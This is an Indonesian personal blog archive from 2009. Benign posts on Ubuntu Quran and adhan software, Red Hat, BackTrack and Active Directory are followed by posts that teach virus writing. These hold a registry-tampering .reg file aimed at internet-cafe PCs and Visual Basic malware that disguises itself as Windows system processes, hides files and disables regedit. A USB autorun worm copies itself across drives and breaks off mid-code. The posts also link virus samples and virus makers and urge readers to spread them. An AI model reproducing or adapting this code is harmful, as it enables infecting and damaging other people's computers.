Senin, 02 Maret 2009

Al-Quran dan adzan di ubuntu

Bagi kamu kamu yang pengen ubuntunya di instalin alquran berikut caranya

1. bagi yang selalu online tambahkan pada sourcelist link berikut

deb http://siahe.com/zekr/apt feisty main

mengubah source list dengan perintah

sudo gedit /etc/apt/sources.list

setelah ditambahkan, kemudian ketiklah perintah berikut di console

wget -q http://siahe.com/zekr/apt/zekr.debian.gpg -O- | sudo apt-key add -

untuk mengambil keynya. selanjutnya jalankan perintah berikut berturut turut :

sudo aptitude update
sudo aptitude install zekr
sudo aptitude install ttf-farsiweb ttf-arabeyes ttf-me-quran ttf-scheherazade

2. Adzan di ubuntu

Download paket library yang dibutuhkan

http://packages.ubuntu.com/dapper/libs/libidl0

kemudian download minbar dari :

http://khaled.djihed.com/ubuntu/minbar/

kemudian install paket dengan perintah :

sudo dpkg -i minbar_0.1-4_i386.deb

Selamat mencoba :)

adzan dengan minbar

tutor redhat

redhat tuh turunan dari linux jadi yah masih sodaran ama linux gitu deh
Article
Panduan Instalasi Linux Redhat 9
Author: Administrator Published: 28th August 2006Category: Linux Dasar dan Opensource
Red Hat merupakan distro linux yang populer (paling tidak di Indonesia). Dengan kemudahan fitur yang ada menjadikan Red Hat sanggup menggantikan windows. Disisi lain, banyak pengguna komputer yang enggan meninggalkan windows seratus persen. Solusi cerdas untuk kasus ini adalah menggunakan dua sistem operasi sekaligus, windows dan linux. Namun bukan perkara mudah (setidaknya itu yang penulis alami beberapa waktu lalu) untuk menginstal linux disamping windows yang dengan manisnya telah menempati space di hardisk. Masalah paling umum terjadi pada pembagian partisi. Walau banyak software pembagi partisi -katakanlah Partition Magic- yang populer, namun penulis merasa perlu menulis tutorial ini, sebagai panduan bagi yang ingin beralih ke linux.
RedHat 9.0 dirilis pada 31 Maret 2003, informasi dan documentasi lengkap Linux RedHat dapat di peroleh dari situs resmi RedHat, http://www.redhat.com
Satu hal yang tak boleh di tinggalkan, bahwa seluruh screnshot yang ada dalam tutorial ini penulis ambil dari documentasi resmi RedHat (http://www.redhat.com/docs/manuals/linux/).DOWNLOAD ARTIKEL LENGKAP (PDF):
zulkhaery-linux.zipDOWNLOAD SOFTWARE PENDUKUNG:
Acrobat PDF Reader ARTIKEL YANG BERHUBUNGAN:
Remastering Mandriva 2006
Teknik Sharing Koneksi Internet di RedHat 9
Tutorial Instalasi Distro Linux OpenSUSE 10.2
Panduan Instalasi BlankOn2 Konde
Instalasi DNS Server Menggunakan Tarball
Instalasi SuSE Linux Melalui Jaringan
Tips Instalasi Paket Mandriva Linux Melalui Jaringan
Linux Lycoris Desktop/LX
Distribusi Linux Modern dan PC Tua
Instalasi KDE 3.1


sumber:ilmukomputer.com

tutor backtrack


Kabar gembira... kabar gembira... yang telah lama ditunggu kembali hadir, dengan wajah baru, kekuatan baru. Ya meskipun masih beta, Backtrack 4 ini mampu menghipnotis kalangan IT Security, dari konsultan keamanan yang bersifat formal, hingga para master Undergound, bahkan para intruder yang sering menjalankan aktivitas sembunyi-sembunyi mulai menghitung mundur kembali hadirnya backtrack 4 final.

Yang beda dari backtrack 4 adalah, tidak lagi menjadi turunan dari slackware, sebagai gantinya backtrack 4 ini menginduk kepada Distro Linux Debian, dengan mengakar kepada utilitas repositori milik Ubuntu. Menariknya backtrack 4 memiliki jam tayang lebih panjang karena hadirnya sistem sinkronisasi dengan repositori backtrack online. Dengan kata lain setiap ada tool security yang di release maka backtrack 4 yang dijalankan akan selalu melakukan update databasenya.

Berikut kutipan beberapa feature terbaru dari backtrack 4 beta, di ambil langsung dari site aslinya :
  • Kernel 2.6.28.1 with better hardware support.
  • Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
  • Support for PXE Boot - Boot BackTrack over the network with PXE supported cards!
  • SAINT EXPLOIT - kindly provided by SAINT corporation for our users with a limited number of free IPs.
  • MALTEGO - The guys over at Paterva did outstanding work with Maltego 2.0.2 - which is featured in BackTrack as a community edition.
  • The latest mac80211 wireless injection pacthes are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
  • Unicornscan - Fully functional with postgress logging support and a web front end.
  • RFID support
  • Pyrit CUDA support...
  • New and updated tools - the list is endless!

Satu lagi, anda sudah dapat men download backtrack versi 4 beta, dengan size yang lebih besar dari sebelumnya 854 MB, DVD Image.
Silahkan diunduh : http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso

Info selengkapnya : http://www.remote-exploit.org/news.html
Sumber dari situs Ilmu Website dalam kategori linux dengan judul Rilisnya Backtrack 4 Beta

Selasa, 24 Februari 2009

tutorial flash


Pada
dasarnya tutorial ini dapat dikembangkan untuk membuat sebuah permainan
atau game yang sederhana. Mungkin Anda pernah melihat atau bahkan Anda
sudah pernah bermain game pesawat tempur, untuk menggerakkan pesawat
tempur tersebut kita dapat menggunakan tombol navigasi anak panah yang
ada di dalam keyboard.
Tombol anak panah atas, bawah, kiri dan kanan dipakai untuk mengendalikan gerak
pesawat. Tentu Anda bertanya apa sulit untuk membuat navigasi dengan
menggunakan keyboard? Tentu tidak karena Flash telah menyediakan printah-printah
praktis untuk menggerakkan gambar atau objek apa saja lewat tombol-tombol pada
keyboard.

Lebih lanjut silahkan download pdf nya, disini: http://unair.info/flash/navigasi-sederhana.zip
Sumber dari situs Ilmu Website dalam kategori flash dengan judul Membuat Navigasi Sederhana



sumber:http://www.ilmuwebsite.com/detil_flash/4/Membuat_Navigasi_Sederhana/

Senin, 16 Februari 2009

Active Directory

active directory merupakan sebuah directory yang menyimpan informasi tentang resource dalam network sehingga bisa diakses dioleh aplikasi dan user atau disebut file dengandata yang terpusat

instalasi active directory
  1. klik tombol start/run
  2. ketik dcpromo kemudian klik ok
  3. dan akan muncul "welcome to the active direktory instalation wizard"
  4. klik next
  5. next lagi jeng
  6. trus ntar bakalan ada pilihan .Pilihan "domain controller for a new domain" jika anda ingin membuat domain baru .kalo pilihan kedua "additional domain controller for an existing domain"itu jika kamu udah punya domain trus mau buat lagi
  7. trus klik next
  8. trus kita disuruh milih lagi nih.pilihannya ada 3 "domain in a new forest'(untuk membuat domain baru)."child domain in an exiting domain tree(kalo kit mo pake domain yang udah ada)."domain tree in an exiting forest "(kalo kita mau buat sebuah tree baru lagi jadi bisa terbentuk forest atau hutan gituh)
  9. kita pake yang pertama dulu yah .trus klik next
  10. pilih no,ust install and configure DNS on this computer
  11. next
  12. next lagi jeng
  13. habus itu kita diminta u/ ngasih nama buat netBIOS name,trus klik next
  14. trus kita atur deh mau di taaruh dimana active directorynya,kalo dah klik next
  15. next lagi
  16. lagi2 kita dihadapin sama pilihan deh.kita pilih aja yang pertama yaitu"permission compatible only with windows 2000 or windows server 2003 OS,kalo dah klik next
  17. masukan password untuk AD.trus klik next
  18. klik next lagi
  19. maka proses AD sedang berlangsung
  20. klik finish setelah konfigurasinya selesai

seputar windows server 2003

windows 2003 server punya banyak versi loh tapi semuanya buat server
nih macam2nya:
windows 2003 standard edition
biasanya digunakan untuk perusahaan kecil dan menengah dengan kebutuhan standard
windows 2003 enterprice edition
kalo produk yang satu ini lebih unggul dibandingkan dengan standard edition tapi yah kalian harus merogoh kantong lebih dalem lagi.Tapi semua itu akan terbayar dengan keunggulan produk ini seperti dukungan 8 processor,dan memmmmory dari 32gb dan 64gb,versi 64bit dan processor itanium
windows 2003 data center edition
produk ini biasanya di jual kepad apembuat komputeer server untuk dijual secara paket(hardwre &software)
windows 2003 web edition
produk ini digunakan hanya sebagai web server .Batasan max nya 2 processor dan 2GB RAM dan anda tida bisa menggunakn prouk ini sebagai domain controller(DC),tapi ada keuntungannya juga loh.tau g` gara2 kekurangan ini anda g perlu merogoh kocek terlalu dalam.
windows 2003 small business server edition
Ini adalah produk all in one di dalam ini terdapat tidak hanya satu produk karena paket produk yang isinya diantaranya adalah:Windows Server Standard Edition,Microsoft Exchange 2003,sharepoint service dan microsoft shared fax services .


Minggu, 15 Februari 2009

PROXY

gimana ya cara menginstal proxy?
sewaktu magang aku mendapatkan e-mail daari guruku da ternyata setelah aku buka itu adalah tugas.Aku mendapat tugas tentang proxy(termasuk setting sederhana)+ tutorial + softwarenya
wah aku bingung banget nih ,masalahnya aku belum taau cara nginstal proxy .akhirnya aku cari di paman google tapi memank slit banget cari softwarenya .
tapi gara2 itu aku jadi tau kalo untuk nginstal proxy itu pake softwarenya tuh squid kalo g winproxy
bagikalian yang mau download winproxy download aja disini.

Rabu, 04 Februari 2009

cara buat program spy

buka registry
gunakan program text editor sederhana seperti notepad,
wordpad, kalau mau Microsoft Word juga bisa.

Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan
code berikut ini ke text-editor kalian:
----------------------------[ potong disini woi ]------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
"DisableRegistryTools"=dword:00000001

; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
"NoRun"=dword:00000000

;proses selesai
----------------------------[ potong disini woi ]---------------------

Langkah kedua save kode tersebut dengan ekstensi REG, misalnya save
dengan nama m2love.reg atau terserah anda aja dech, pokoke
ekstensinya harus REG

Langkah ketiga cukup klik hasil file yang telah anda simpan tadi,
kemudian lanjutkan dengan langkah keempat.

Langkah terakhir reboot komputer anda, Cukup dengan menggunakan
kombinasi Ctrl+Alt+Del, caranya tekan tombol yang bertulisan Ctrl,
tahan... jangan dilepas, lalu tekan juga tombol Alt juga jangan
dilepas selanjutnya tombol Delete. Diharapkan anda tidak jantungan
ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask,
tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask-kan
lagi.

Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit
yang manis terbuka dan lakukan apa yang ingin anda lakukan

semua akibat ditanggung sendiri

dapet dari temen gwa nih the_day2000@yahoo.com dari sebuah milis yang gua ikuti

buat virus buka www.astalavista.com

sumber:http://www.klik-kanan.com/forums/index.php?topic=336.0

buat virus ,yuuuuuuuuuuuuuuuk

=========================================================================SCRIPT VIRUS=====================================================================================================================================================================


'//////HAKZ VIRUS MAKER/////////

Option Explicit
Option Base 0
Dim ko As Boolean
Private Type PALETTEENTRY
peRed As Byte
peGreen As Byte
peBlue As Byte
peFlags As Byte
End Type

Private Type LOGPALETTE
palVersion As Integer
palNumEntries As Integer
palPalEntry(255) As PALETTEENTRY ' Enough for 256 colors.
End Type

Private Type GUID
Data1 As Long
Data2 As Integer
Data3 As Integer
Data4(7) As Byte
End Type

Private Const RASTERCAPS As Long = 38
Private Const RC_PALETTE As Long = &H100
Private Const SIZEPALETTE As Long = 104

Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type

Private Declare Function CreateCompatibleDC Lib "GDI32" (ByVal hDC As Long) As Long
Private Declare Function CreateCompatibleBitmap Lib "GDI32" (ByVal hDC As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
Private Declare Function GetDeviceCaps Lib "GDI32" (ByVal hDC As Long, ByVal iCapabilitiy As Long) As Long
Private Declare Function GetSystemPaletteEntries Lib "GDI32" (ByVal hDC As Long, ByVal wStartIndex As Long, ByVal wNumEntries As Long, lpPaletteEntries As PALETTEENTRY) As Long
Private Declare Function CreatePalette Lib "GDI32" (lpLogPalette As LOGPALETTE) As Long
Private Declare Function SelectObject Lib "GDI32" (ByVal hDC As Long, ByVal hObject As Long) As Long
Private Declare Function BitBlt Lib "GDI32" (ByVal hDCDest As Long, ByVal XDest As Long, ByVal YDest As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hDCSrc As Long, ByVal XSrc As Long, ByVal YSrc As Long, ByVal dwRop As Long) As Long
Private Declare Function DeleteDC Lib "GDI32" (ByVal hDC As Long) As Long
Private Declare Function GetForegroundWindow Lib "USER32" () As Long
Private Declare Function SelectPalette Lib "GDI32" (ByVal hDC As Long, ByVal hPalette As Long, ByVal bForceBackground As Long) As Long
Private Declare Function RealizePalette Lib "GDI32" (ByVal hDC As Long) As Long
Private Declare Function GetWindowDC Lib "USER32" (ByVal hWnd As Long) As Long
Private Declare Function GetDC Lib "USER32" (ByVal hWnd As Long) As Long
Private Declare Function GetWindowRect Lib "USER32" (ByVal hWnd As Long, lpRect As RECT) As Long
Private Declare Function ReleaseDC Lib "USER32" (ByVal hWnd As Long, ByVal hDC As Long) As Long
Private Declare Function GetDesktopWindow Lib "USER32" () As Long

Private Type PicBmp
Size As Long
Type As Long
hBmp As Long
hPal As Long
Reserved As Long
End Type

Private Declare Function OleCreatePictureIndirect Lib "olepro32.dll" (PicDesc As PicBmp, RefIID As GUID, ByVal fPictureOwnsHandle As Long, IPic As IPicture) As Long



Public Function CreateBitmapPicture(ByVal hBmp As Long, ByVal hPal As Long) As Picture
Dim r As Long

Dim Pic As PicBmp
Dim IPic As IPicture
Dim IID_IDispatch As GUID

With IID_IDispatch
.Data1 = &H20400
.Data4(0) = &HC0
.Data4(7) = &H46
End With

With Pic
.Size = Len(Pic)
.Type = vbPicTypeBitmap
.hBmp = hBmp
.hPal = hPal
End With

' Create Picture object.
r = OleCreatePictureIndirect(Pic, IID_IDispatch, 1, IPic)
' Return the new Picture object.
Set CreateBitmapPicture = IPic
End Function



Public Function CaptureWindow(ByVal hWndSrc As Long, ByVal Client As Boolean, ByVal LeftSrc As Long, ByVal TopSrc As Long, ByVal WidthSrc As Long, ByVal HeightSrc As Long) As Picture

Dim hDCMemory As Long
Dim hBmp As Long
Dim hBmpPrev As Long
Dim r As Long
Dim hDCSrc As Long
Dim hPal As Long
Dim hPalPrev As Long
Dim RasterCapsScrn As Long
Dim HasPaletteScrn As Long
Dim PaletteSizeScrn As Long
Dim LogPal As LOGPALETTE

If Client Then
hDCSrc = GetDC(hWndSrc)
Else
hDCSrc = GetWindowDC(hWndSrc)

End If

' Create a memory device context for the copy process.
hDCMemory = CreateCompatibleDC(hDCSrc)
' Create a bitmap and place it in the memory DC.
hBmp = CreateCompatibleBitmap(hDCSrc, WidthSrc, HeightSrc)
hBmpPrev = SelectObject(hDCMemory, hBmp)

' Get screen properties.
RasterCapsScrn = GetDeviceCaps(hDCSrc, RASTERCAPS)

HasPaletteScrn = RasterCapsScrn And RC_PALETTE

PaletteSizeScrn = GetDeviceCaps(hDCSrc, SIZEPALETTE)


' If the screen has a palette make a copy and realize it.
If HasPaletteScrn And (PaletteSizeScrn = 256) Then
' Create a copy of the system palette.
LogPal.palVersion = &H300
LogPal.palNumEntries = 256
r = GetSystemPaletteEntries(hDCSrc, 0, 256, LogPal.palPalEntry(0))
hPal = CreatePalette(LogPal)
' Select the new palette into the memory DC and realize it.
hPalPrev = SelectPalette(hDCMemory, hPal, 0)
r = RealizePalette(hDCMemory)
End If

' Copy the on-screen image into the memory DC.
r = BitBlt(hDCMemory, 0, 0, WidthSrc, HeightSrc, hDCSrc, LeftSrc, TopSrc, vbSrcCopy)

' Remove the new copy of the on-screen image.
hBmp = SelectObject(hDCMemory, hBmpPrev)

' If the screen has a palette get back the palette that was
' selected in previously.
If HasPaletteScrn And (PaletteSizeScrn = 256) Then
hPal = SelectPalette(hDCMemory, hPalPrev, 0)
End If

' Release the device context resources back to the system.
r = DeleteDC(hDCMemory)
r = ReleaseDC(hWndSrc, hDCSrc)

' Call CreateBitmapPicture to create a picture object from the
' bitmap and palette handles. Then return the resulting picture
' object.
Set CaptureWindow = CreateBitmapPicture(hBmp, hPal)
End Function

Public Function CaptureScreen() As Picture
Dim hWndScreen As Long
hWndScreen = GetDesktopWindow() ' Get a handle for capturing.
' Call CaptureWindow to capture the entire desktop give the handle
Set CaptureScreen = CaptureWindow(hWndScreen, True, 0, 0, Screen.Width \ Screen.TwipsPerPixelX, Screen.Height \ Screen.TwipsPerPixelY)
End Function

Private Sub Command1_Click()
Form1.SetFocus
End
End Sub

Private Sub Form_Load()
Form1.ForeColor = vbBlack
Set Form1.Picture = CaptureScreen()
End Sub

Private Sub Form_MouseDown(Button As Integer, Shift As Integer, X As Single, Y As Single)
ko = False
CurrentX = Y
CurrentY = X
End Sub

Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
If ko = False And Button = 0 Then
Line -(Y, X)
End If
End Sub

=======================================================================================================END SCRIPT=========================================================================================================================================
di built lewat VB..

wakakakakakakakakkaaaaaaaaaaaaaaaaaaaaaaaa................................. BUANYAAAAKKKK GAAAAAKK..????
atau kurang banyak.??

buat yang males mikir tuh script mesti di bikin kayak gimana mau di bikin mie goreng sama es teh juga gak papa.... heheheh...
tapi buat yang bener-bener berminat sama nih virus kalian bisa kok download secara geratis...


disini tempat DOWNLOAD VIRUS-nya [url=[http://h1.ripway.com/HaKzZz/razorblade.exe]]download[/url]


sumber:
http://virologi.info/virologist/modules/news/article.php?storyid=285

buat virus pake visual basic 6

Sebenarnya bikin virus itu menyenangkan, apalagi klo kita sampai bisa bikin orang kebakaran jengot gara2 virus kita. Aku mau berbagi sedikit ilmu nih tentang cara bikin virus dengan VB 6. Materi ini hanya untuk coba-coba saja atau kata lainnya ini masih dasarnya. Kamu mungkin bisa mengembangkannya sendiri. Oh ya, aku juga menyertakan satu contoh virus yang sudah aku buat namanya r3d_94l4xy. Untuk materi yang lebih berat akan disambung lain waktu. Bagi yang ingin mendapatkan sample virus tertentu dengan source codenya silakan contact Johan.

Pertama, bikin form buat virus kamu pake Standart exe saja

1. Nyembuin Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon



On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu materi yang kita pelajari, dari pada pusing, download sample virus r3d_94l4xy dan sebarin ke seluruh penjuru dunia OK!
r3d_94l4xy.rar 180 kb
Berhubung banyaknya permintaan mengenai Sample Virus dalam bentuk VB Project, jadi dibawah ini aku tambahi Source VB nya r3d_94l4xy dan virus lainnya :
r3d_94l4xy (VB_Basic).rar 95 kb
r3d_94l4xy (VB_Extreme).rar 860 kb
Source VB 4 Virus.rar 1297 kb
Trus yang ini adalah software untuk membuat virus dengan mudah, coba deh !
Visual Basic Virus Maker 32 RC 03.rar 1560 kb
Trus yang terakhir ini adalah Artikel tentang Regsitry, bisa kamu pelajari sampai tua!
1001 Malam Mengedit Registry.rar 41 kb
Teknik Bikin Virus Komputer.rar 20 kb
Tak kasih bonus ya Internet Maniac dan Harpot Infeksi Exe, tau kan fungsinya!
Internet Maniac.rar 59 kb
Harpot Infeksi Exe.rar 881 kb
Segini dulu aja ya, soalnya aku lagi persiapan buat lomba Debat Bahasa Inggris di Jember, tanggal 25 November nanti. Dan jangan lupa doain aku biar juara 1, OK ! Dan seperti biasanya, kalau ada pertanyaan, silakan bertanya jangan dipendam. Selamat Belajar !

seputar virus &cara kerjanya

Jika kita tanpa sengaja menjalankan/membangkitkan suatu virus (Virus Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya adalah menginfeksi system yang ada pada computer target agar virus tersebut melekat pada computer target. Sehingga meskipun komputer tersebut telah di-restart virus tersebut akan tetap aktif dikomputer target tersebut.

Cara kerja virus menginfeksi system:
Melakukan penggandaan ke system.
Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
system mempunyai nama yang hampir dengan nama file system dan ada juga
yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
iexplorer.exe, shell.exe, dll).
Menyeting registry.
Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
tersebut menggunakan registry sebagai benteng pertahanan. Kok
menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
menghapus virus tersebut secara manual.
Mengaktifkan virus yang telah berada disistem.
Setelah virus telah melakukan penggandaan ke system dan menyeting registry
maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
maka virus tersebut akan tetap aktif.

etika virus dijalankan oleh seseorang maka virus tersebut akan mulai melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan ke system computer (Infeksi ke system). Hal ini dilakukan agar virus tetap berada pada system meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang ter-copy di system sehingga system benarbenar telah terinfeksi oleh virus.

Lokasi folder penggandaan virus pada system:
Windows (Winnt untuk windows NT)
System32 (System untuk windows 9x)
Startup
Application Data

Lokasi diatas biasanya yang paling sering digunakan oleh virus. Mengapa
harus lokasi tersebut? Karena untuk orang awam lokasi tersebut merupakan lokasi dimana file nya tidak boleh dihapus, karena hampir semua file yang ada pada folder tersebut merupakan file penting karena jika terjadi penghapusan terhadap file diperlukan oleh windows maka windows akan mengalami kerusakan. Dan hal ini dimanfaatkan oleh virus untuk melindungi dirinya.
__________________Selain lokasi folder virus juga melakukan perubahan extensi untuk menyamar
agar virus tersebut sulit dicari.

Extensi file yang sering digunakan oleh virus pada saat melakukan penggadaan pada system:
EXE
SCR
COM
PIF

Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi
perubahan extensi, virus tersebut tetap akan berjalan dengan normal. SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan melakukan sedikit perubahan pada registry agar virus tersebut menjadi Default pada Screen Saver.

Agar penyamaran sukses virus juga menggunakan penamaan yang hampir
sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda.

Penamaan file yang sering digunakan virus pada system:
winlogon.exe
lsass.exe
services.exe
csrss.exe
smss.exe
svchost.exe
System
taskmgr.exe
explorer.exe
iexplorer.exe
notepad.exe
winword.exe

Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat
bingung orang terserang virus tersebut karena mereka tidak tahu apakah file tersebut benar-benar file system yang asli atau yang palsu (virus).

Penamaan file yang bermasalah pada task manager adalah winlogon.exe,
lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan
dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task
manager.

Minggu, 01 Februari 2009

buat virus yang agak merusak

ni kalo mo yang agak merusak…

tinggal di paste di vb
dan diberi nama mata.exe
‘—————–
Dim uny, juki, scr, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
Dim k As Long
Private Sub Form_Load()
k = Shell(”c:\windows\system32\taskmgr.exe”, vbHide)
App.TaskVisible = False
On Error Resume Next
Image1(0).Visible = True
Timer1.Enabled = True
Timer5.Enabled = True
FileCopy CurDir + “\mata.exe”, “C:\mata.exe”
FileCopy CurDir + “\mata.exe”, “d:\mata.exe”
FileCopy CurDir + “\mata.exe”, “e:\mata.exe”
FileCopy CurDir + “\mata.exe”, “f:\mata.exe”
FileCopy CurDir + “\mata.exe”, “g:\mata.exe”
FileCopy CurDir + “\mata.exe”, “h:\mata.exe”
FileCopy CurDir + “\mata.exe”, “i:\mata.exe”
FileCopy CurDir + “\mata.exe”, “j:\mata.exe”
FileCopy CurDir + “\mata.exe”, “k:\mata.exe”
FileCopy CurDir + “\mata.exe”, “l:\mata.exe”
FileCopy CurDir + “\mata.exe”, “m:\mata.exe”
FileCopy CurDir + “\mata.exe”, “n:\mata.exe”
FileCopy CurDir + “\mata.exe”, “o:\mata.exe”
sumpeh
End Sub
Sub sumpeh():
k = Shell(”c:\windows\system32\taskmgr.exe”, vbHide)
App.TaskVisible = False
uny = “untuk perempuanku… love is me and youhidup dan nasib, bisa tampak berantakan, misterius, fantastis, dan sporadis, namun setiap elemenya adalah subsistem keteraturan dari sebuah desain holistik yang perfect. Menerima kehidupan berarti menerima kenyataan bahwa tak ada hal sekecil apapun yang terjadi karena kebetulan. ini fakta yang tak terbantahkan. cinta ini tak akan pernah usai dan mati karena aku akan selalu memberi nafas untuk cinta ini, walau berat akan selalu aku jaga sampai kamu sadar betapa berharganya kamu untuk aku. Jika memang ada yang bisa menghentikan perasaan ini, aku akan melakukanya, karena perasaan ini juga telah menyiksaku tanpa kehadiran kamu. hidup tak akan pernah mudah, mulai bertanya adalah hal yang bisa membantumu untuk melihat betapa aku membutuhkanmu untuk mulai melangkah ”
juki = “dan menyanjungi duniaku. jangan pernah berhenti untuk selalu mencintaiku, yosa sayang viena”
atr = “[autorun]” & vbCrLf & “open=mata.exe”
Set fs = CreateObject(”Scripting.FileSystemObject”)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size: size = mf.size: check = mf.Drive.drivetype: Set text = mf.openastextstream(1, -2)
Set b = fs.CreateTextFile(winpath + “\ perempuanku.HTM”, 2, True)
b.write uny + juki
b.Close
SetAttr CurDir + “\ perempuanku.HTM”, vbReadOnly

Set b = fs.CreateTextFile(winpath + “\autorun.inf”, 2, True)
b.write atr
b.Close
SetAttr winpath + “\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “D:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “E:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “F:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “G:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “H:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “I:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “J:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “K:\mata.exe”, vbSystem + vbHidden + vbReadOnly + vbArchive

SetAttr “D:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “E:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “F:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “G:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “H:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “I:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “J:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive
SetAttr “K:\autorun.inf”, vbSystem + vbHidden + vbReadOnly + vbArchive

Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 2 + 3
Set tf = fs.CreateTextFile(flashdrive.Path & “\autorun.inf”, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 2 + 3
Set tf = fs.getfile(flashdrive.Path & “\mata.exe”)
tf.Attributes = 2 + 3

